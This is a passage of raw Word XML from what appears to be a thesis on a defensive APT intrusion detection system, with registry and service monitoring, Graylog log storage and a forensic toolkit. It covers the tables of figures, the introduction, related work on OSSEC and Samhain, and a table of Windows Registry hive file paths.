            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001D1C85" w:rsidRDefault="00856098">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc485239561" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.14 Graylog capture the events for creating and deleting Windows Services</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239561 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>97</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00FB2F32" w:rsidRDefault="00FB2F32" w:rsidP="00FB2F32">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C437AB" w:rsidRPr="00811A53">
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="18"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8F0F14"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4886359" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="002B2850">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 2.1 Registry keys and their correlations.</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886359 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00856098">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886360" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="002B2850">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 2.2 List of Registry hives and their filenames on system disk.</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886360 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00856098">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886361" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="002B2850">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 2.3 Registry hive cells and their data types.</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886361 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00856098">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886362" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="002B2850">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 2.4 Root keys and their descriptions.</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886362 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00856098">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886363" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="002B2850">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 2.5 System Registry value types and their descriptions.</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886363 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00856098">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886364" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="002B2850">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 2.6 Service Registry values and descriptions</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886364 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00856098">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886365" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="002B2850">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 2.7 Graylog Collector Sidecar configuration parameters and their descriptions.</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886365 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00856098">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886366" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="002B2850">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 4.1 dwFilter values and their meanings</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886366 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>57</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">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r w:rsidR="008A23FC" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="008A23FC" w:rsidRDefault="008A23FC" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>CLSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="008A23FC" w:rsidRDefault="008A23FC" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Centralize Log Storage System</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8"/>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w:t>
      </w:r>
      <w:r w:rsidR="00CE7B77">
        <w:t xml:space="preserve">tributed Log Collector Hardware, </w:t>
      </w:r>
      <w:r w:rsidR="002558B0">
        <w:t>Centralized Log Storage on Cloud</w:t>
      </w:r>
      <w:r w:rsidR="00CE7B77">
        <w:t xml:space="preserve"> and a respond tool kit called Sentry</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w:t>
      </w:r>
      <w:r w:rsidR="00CE7B77">
        <w:t>g, and alert to the log storage. When</w:t>
      </w:r>
      <w:r w:rsidR="00E73A17">
        <w:t xml:space="preserve"> any</w:t>
      </w:r>
      <w:r w:rsidR="00CE7B77">
        <w:t xml:space="preserve"> incident takes place, </w:t>
      </w:r>
      <w:r w:rsidR="00E73A17">
        <w:t>respond team uses Sentry for analyzing and finding APT source and their persistent executable programs and terminate the threats.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B02E5E" w:rsidRPr="00E445CE" w:rsidRDefault="00A94DD6" w:rsidP="00CA1AEF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc485239562"/>
      <w:r w:rsidRPr="00E445CE">
        <w:lastRenderedPageBreak/>
        <w:t>INTRODUCTION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w:rsidR="00A94DD6" w:rsidRDefault="00235F8C" w:rsidP="006565FE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc485239563"/>
      <w:r>
        <w:t>Motivation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>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have to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6A3B63">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc485239564"/>
      <w:r>
        <w:t>Thesis’ statement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>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2" w:name="_Toc485239565"/>
      <w:r>
        <w:t>Subject</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>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6A3B63">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc485239566"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>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6A3B63">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc485239567"/>
      <w:r>
        <w:t xml:space="preserve">The needs of </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> monitoring module</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>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End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has to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5" w:name="_Toc485239568"/>
      <w:r>
        <w:t>The needs of S</w:t>
      </w:r>
      <w:r w:rsidR="006A3B63">
        <w:t>ervice monitoring module</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>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End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6" w:name="_Toc485239569"/>
      <w:r>
        <w:t>The needs of Distributed L</w:t>
      </w:r>
      <w:r w:rsidR="00990FA2">
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>g Collector H</w:t>
      </w:r>
      <w:r w:rsidR="00990FA2">
        <w:t>ardware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>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7" w:name="_Toc485239570"/>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00990FA2">
        <w:t xml:space="preserve">he needs of </w:t>
      </w:r>
      <w:r w:rsidR="00EE0D90">
        <w:t>Centralized Log Storage System</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>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 xml:space="preserve">s of log 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345B0F" w:rsidRDefault="00345B0F" w:rsidP="00345B0F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc485239571"/>
      <w:r>
        <w:t>The needs of Forensic Toolkit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w:rsidR="005A1547" w:rsidRDefault="00345B0F" w:rsidP="00345B0F">
      <w:r>
        <w:t xml:space="preserve">In APTIDS, Sentry plays a role as an important step for protecting systems from disastrous incident when APT happens. In the Cyber Space, we have learnt that no system is safe. Any threat and any accident can happen in no delay. Protecting systems by monitoring it 24/7 is not enough, some advanced threats can easily bypass our durable shield and penetrate to compromise the network. When things get into the worst situation, our respond team use Sentry as a Forensic toolkit to identify the </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00287BCD">
        <w:t xml:space="preserve"> terminate the threats before they</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can spread wider along with their malicious activi</w:t>
      </w:r>
      <w:r w:rsidR="00287BCD">
        <w:t>ti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">es. </w:t>
      </w:r>
    </w:p>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9" w:name="_Toc485239572"/>
      <w:r w:rsidRPr="00E445CE">
        <w:lastRenderedPageBreak/>
        <w:t>BACKGROUND AND RELATED WORKS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>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30" w:name="_Toc485239573"/>
      <w:r>
        <w:t>Related works</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w:rsidR="00C525C7" w:rsidRDefault="00C525C7" w:rsidP="00C525C7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc485239574"/>
      <w:r>
        <w:t>OSSEC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w:rsidR="00C525C7" w:rsidRDefault="00C525C7" w:rsidP="00C525C7">
      <w:r>
        <w:t xml:space="preserve">OSSEC </w:t>
      </w:r>
      <w:r w:rsidR="00FA2604">
        <w:t xml:space="preserve">is a host-based instruction detection system (HIDS) </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="812610974"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEnd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etc </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="290561880"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEnd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2" w:name="_Toc483834777"/>
      <w:bookmarkStart w:id="33" w:name="_Toc485239529"/>
      <w:r w:rsidRPr="00927DA6">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w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00927DA6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: OSSEC Processes in a “Server-Agent” Installation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkEnd w:id="33"/>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4" w:name="_Toc485239575"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Samhain</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w:rsidR="00850E34" w:rsidRDefault="00514FF3" w:rsidP="00850E34">
      <w:r>
        <w:t xml:space="preserve">Samhain is a multi-platform, opensource HIDS for POSIX </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="330961426"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEnd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an attacker </w:t>
      </w:r>
      <w:r w:rsidR="004534AE">
        <w:t>compromises</w:t>
      </w:r>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Samhain has been developed mainly for the purpose of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To minimize the impact on the disk IO and get immediate notifications, Samhain can leverage the inotify function in Li</w:t>
      </w:r>
      <w:r w:rsidR="004534AE">
        <w:t>nux kernel system. Inotify is a</w:t>
      </w:r>
      <w:r w:rsidR="00003BB7">
        <w:t xml:space="preserve"> Unix API provides a mechanism for monitoring filesystem events </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1239133370"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEnd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5" w:name="_Toc485239576"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Background</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w:rsidR="00AC6729" w:rsidRDefault="00E41963" w:rsidP="00AC6729">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc485239577"/>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00AC6729">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Registry</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>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End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End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Control\IDConfigDB\Hardware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7" w:name="_Toc484886359"/>
      <w:r w:rsidRPr="00430F22">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1</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">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7"/>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\%windir%\system32\config\system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\%windir%\system32\config\sam</w:t>
            </w:r>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\%windir%\system32\config\security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\%windir%\system32\config\software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\UserProfile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00430F22">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="2A2A2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Profile; usually under \%windir%\profiles\usere</w:t>
            </w:r>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\%windir%\system32\config\default</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A738C2" w:rsidRPr="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00A738C2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc484886360"/>
